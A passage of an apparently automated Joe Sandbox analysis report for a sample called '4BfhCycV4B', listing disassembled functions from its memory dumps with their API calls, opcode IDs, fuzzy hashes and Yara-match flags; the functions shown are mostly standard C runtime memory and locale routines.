                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27118E72760101AFDB84DF56DCC0FA673EAEB88220B598069ED04CB316E676E842C760
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04200D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                                        • Instruction ID: fc80ff171ad150b496fd9bb7b648541e5d288e1a345aca2e49a28a9ce9a563ca
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8301A7767106058FEF21CF24E804FAA33F9EB86215F4584A5E906D72C3E774B941CB90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00411F6A Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$Info
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 26cbc1d9d27217d5c8e1d315439cb4bfc4f6913bb980a28ee140d56c20ad99c6
                                                                                                                                                                                                                                                                                        • Instruction ID: f64e8217d5a59399788f44db3acace11ca7a1a82a17f4f1e7e4f503dd26c9166
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 26cbc1d9d27217d5c8e1d315439cb4bfc4f6913bb980a28ee140d56c20ad99c6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68B1CF71900305AFDB20DFA5C881BEEBBF5BF48304F14416EF959E7242D7B9A8918B64
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 042121D1 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$Info
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 7f1cc673af9145743846b530fb17d4bb0f149097f4a5cdf7631a5188ec6ee8c8
                                                                                                                                                                                                                                                                                        • Instruction ID: 646cfe057837b6c57ad9540a2998844ccc10dd57e6eed54ee349263b8a0b0e28
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f1cc673af9145743846b530fb17d4bb0f149097f4a5cdf7631a5188ec6ee8c8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFB19071A10206EFEB21DF75C880BAEB7F5BF18304F144069F995B7261DB75A9418B60
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041F651 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 0041F695
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA01
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA13
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA25
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA37
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA49
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA5B
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA6D
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA7F
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA91
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAA3
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAB5
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAC7
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAD9
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F68A
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F6AC
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F6C1
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F6CC
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F6EE
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F701
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F70F
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F71A
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F752
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F759
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F776
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F78E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c951b0284f9e04e943596e66b03a80ae0bf1e4afdb8598d1d19a31453786f4ca
                                                                                                                                                                                                                                                                                        • Instruction ID: c0d36dfa6e7f1bd62f92c80ef49453a98ce7ec3addb1216f5c788df5de5df6c1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c951b0284f9e04e943596e66b03a80ae0bf1e4afdb8598d1d19a31453786f4ca
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68314A316007049FEB20AA3AE845BD773E8FB44318F15446FE859D72A1DB38FCC68A18
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0421F8B8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 0421F8FC
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421EC68
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421EC7A
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421EC8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421EC9E
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ECB0
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ECC2
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ECD4
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ECE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ECF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ED0A
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ED1C
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ED2E
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421EC4B: _free.LIBCMT ref: 0421ED40
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F8F1
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: HeapFree.KERNEL32(00000000,00000000,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?), ref: 04216517
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: GetLastError.KERNEL32(?,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?,?), ref: 04216529
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F913
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F928
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F933
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F955
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F968
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F976
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F981
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F9B9
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F9C0
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F9DD
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F9F5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                                                                        • Instruction ID: 046ba40cb1d39455ac754ac26953f0059ff1e28075720edb16651b3be90a2653
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03317C31720206BFEB31AA78DA44B5BB3E9EF20359F11442AE4AAD7170DF36F9418715
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041EAE2 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 9ca89c0a2be171db225f9399c5928e23e7786f3213f928307f835fe8026e7321
                                                                                                                                                                                                                                                                                        • Instruction ID: 07e65b0fe858109c33bb0f60f82280ccd5dee523497fe62cc235ec4013c6f493
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9ca89c0a2be171db225f9399c5928e23e7786f3213f928307f835fe8026e7321
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9EC15575E40304ABDB20DBA9CC46FDE77F8EB48704F14416AFE05EB282D674AD818798
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00423356 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042435F), ref: 00423379
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: DecodePointer
                                                                                                                                                                                                                                                                                        • String ID: _CB$acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                                                                        • API String ID: 3527080286-940912563
                                                                                                                                                                                                                                                                                        • Opcode ID: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
                                                                                                                                                                                                                                                                                        • Instruction ID: 5368ad48e2641d38b699083c4314cf7ba7867baba3e9f2aa5664b85b9913fc9a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52518970A00229DBCF10DFA9F9481ADBBB0FB09305FE4419BE481A6254CB7D9B65CB1D
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00416C25 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C39
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C45
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C50
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C5B
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C66
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C71
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C7C
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C87
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416C92
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416CA0
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 021fc169888c534eb65bb877dd545a1d2b965921c27eab449b7d3461ade1895a
                                                                                                                                                                                                                                                                                        • Instruction ID: 425b14d8582b8484cae793816d5f4fa8e3af98928aded5048720e3a5ca7bcabf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 021fc169888c534eb65bb877dd545a1d2b965921c27eab449b7d3461ade1895a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B311E976100218BFDF01FF95D952DD93B65EF48358B4280AAFD088F222DA35EE919B84
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04216E8C Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216EA0
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: HeapFree.KERNEL32(00000000,00000000,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?), ref: 04216517
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: GetLastError.KERNEL32(?,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?,?), ref: 04216529
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216EAC
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216EB7
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216EC2
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216ECD
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216ED8
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216EE3
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216EEE
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216EF9
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04216F07
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                                                                        • Instruction ID: 4eb2e0ea5850d63a217f63741ede847a0d9035121240c4a9739253c5e6e0ddf9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF11B975620108BFDB11EF94C840EDD3BA5EF24399B5185A5F9098F135DA32FA50DB81
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004011B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004011B5
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
                                                                                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204
                                                                                                                                                                                                                                                                                          • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
                                                                                                                                                                                                                                                                                          • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD
                                                                                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00401225
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00401233
                                                                                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                                                                                                                                        • API String ID: 835844855-1405518554
                                                                                                                                                                                                                                                                                        • Opcode ID: 551815f9359f67e0d68c3a144b51d518d1ef5bda6ce690e7d9066db005d92ba4
                                                                                                                                                                                                                                                                                        • Instruction ID: 963657a0c5d8f337c123b09bbff0c4169cb5784efefba0bb6704a6d5c2622931
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 551815f9359f67e0d68c3a144b51d518d1ef5bda6ce690e7d9066db005d92ba4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E319F31905B40DEC7319F6AD941A5BFBF0BF48714B508A7FE04AA3AA1C738A504CB5D
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 042043F0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 042043F5
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 04204404
                                                                                                                                                                                                                                                                                        • int.LIBCPMT ref: 0420441B
                                                                                                                                                                                                                                                                                          • Part of subcall function 0420157F: std::_Lockit::_Lockit.LIBCPMT ref: 04201590
                                                                                                                                                                                                                                                                                          • Part of subcall function 0420157F: std::_Lockit::~_Lockit.LIBCPMT ref: 042015AA
                                                                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 04204424
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 04204455
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0420446B
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 04204491
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                        • String ID: {wB
                                                                                                                                                                                                                                                                                        • API String ID: 1202896665-1598656814
                                                                                                                                                                                                                                                                                        • Opcode ID: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                                                                        • Instruction ID: 6a72ba920ea3ec989d6bfafd10368b37bfc662e576df117c39c93bda0226a64f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA110172B201249BDB15FBA4DC44AEEBBB4EF84718F14C11AE801B72D1DB70BA01C7A0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04203651 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 04203656
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 04203665
                                                                                                                                                                                                                                                                                        • int.LIBCPMT ref: 0420367C
                                                                                                                                                                                                                                                                                          • Part of subcall function 0420157F: std::_Lockit::_Lockit.LIBCPMT ref: 04201590
                                                                                                                                                                                                                                                                                          • Part of subcall function 0420157F: std::_Lockit::~_Lockit.LIBCPMT ref: 042015AA
                                                                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 04203685
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 042036B6
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 042036CC
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 042036F2
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
